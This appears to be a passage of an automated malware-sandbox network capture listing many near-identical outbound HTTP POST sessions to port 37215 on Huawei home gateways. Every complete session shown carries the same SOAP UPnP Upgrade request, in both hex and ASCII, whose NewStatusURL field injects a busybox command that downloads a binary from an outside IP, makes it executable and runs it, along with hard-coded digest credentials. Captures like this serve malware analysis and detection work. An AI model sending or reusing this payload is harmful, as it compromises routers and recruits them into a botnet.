2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2309192.168.2.154704441.94.184.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.676229000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2310192.168.2.154103441.224.42.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.676249027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2311192.168.2.153565841.13.54.5737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.676290035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2312192.168.2.155892841.94.234.17337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.676573038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2313192.168.2.155452441.208.202.2837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.804922104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2314192.168.2.155319041.210.103.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805006027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2315192.168.2.154093841.83.73.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805006027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2316192.168.2.155638041.144.225.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805006027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2317192.168.2.154239041.229.50.10137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805037975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2318192.168.2.153926041.70.42.15537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805061102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2319192.168.2.153463241.25.64.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805082083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
